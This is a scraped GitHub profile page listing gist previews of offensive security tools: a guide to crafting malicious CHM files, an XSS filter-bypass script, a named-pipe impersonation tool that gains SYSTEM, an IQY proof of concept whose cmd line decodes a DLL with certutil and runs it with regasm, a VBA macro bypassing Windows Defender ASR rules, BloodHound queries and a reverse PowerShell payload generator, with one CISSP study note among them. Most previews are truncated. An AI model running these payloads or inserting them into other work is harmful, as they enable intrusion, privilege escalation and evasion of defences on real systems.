Skip to content

Instantly share code, notes, and snippets.

View OlivierLaflamme's full-sized avatar
:shipit:
؁؁؁؁؁؁؁؁؁؁؁؁؁؁🏴 403 Forbidden؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁🚩؁؁؁؁؁؁؁؁؁

Boschko OlivierLaflamme

:shipit:
؁؁؁؁؁؁؁؁؁؁؁؁؁؁🏴 403 Forbidden؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁🚩؁؁؁؁؁؁؁؁؁
641 followers · 211 following
View GitHub Profile
@mgeeky
mgeeky / Malicious-CHM-Guide.md
Created February 6, 2018 13:52
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
@YasserGersy
YasserGersy / Js2S.py
Last active April 16, 2024 02:50
javascript mutil lines payload into one line
#The main purpose is to bypass xss filters and execute multi lines payload
#write your payload to a file.txt
#run the script and pass the file as argument
# $python js2S.py file.txt
# copy the output and pass the output paylad to a javascript function document.write or eval ,, etc ,
#for example , http://vuln2-xss.com/?name=document.write(__output__)
#if any character from the following is filtered , remove it.
import sys,os
@makelariss
makelariss / popshellslikeitsafriday.py
Last active December 17, 2021 05:31
NT AUTHORITY\SYSTEM through Named Pipe Impersonation using Python
# -*- coding: UTF-8 -*-
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)
@wdormann
wdormann / acltest.ps1
Created May 1, 2018 15:20
Check for paths that are writable by normal users, but are in the system-wide Windows path. Any such directory allows for privilege escalation.
If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
Write-Warning "This script will not function with administrative privileges. Please run as a normal user."
Break
}
$outfile = "acltestfile"
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";")
Foreach ($path in $paths) {
# This prints a table of ACLs
# get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights
@namishelex01
namishelex01 / cissp_notes.md
Created July 3, 2018 12:52 — forked from penafieljlm/cissp_notes.md
Personal CISSP Study Notes

CISSP Notes

CIA Triad

  • Confidentiality
    • Resources should be protected from unauthorized access
    • Prioritized by governments
    • Concepts
      • Sensitivity
        • How harmful is disclosure
  • Discretion
@Mr-Un1k0d3r
Mr-Un1k0d3r / poc.iqy
Created August 1, 2018 18:59
IQY File + Embedded DLL POC
WEB
1
https://ringzer0team.com/IQY
Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
@Mr-Un1k0d3r
Mr-Un1k0d3r / remote.iqy
Last active April 27, 2022 19:25
IQY File Remote Payload POC
=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'
@jeffmcjunkin
jeffmcjunkin / gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
Last active November 12, 2023 16:35
Useful Cypher queries for BloodHound
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------
MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,
@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active April 25, 2024 21:00
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@tothi
tothi / mkpsrevshell.py
Created February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])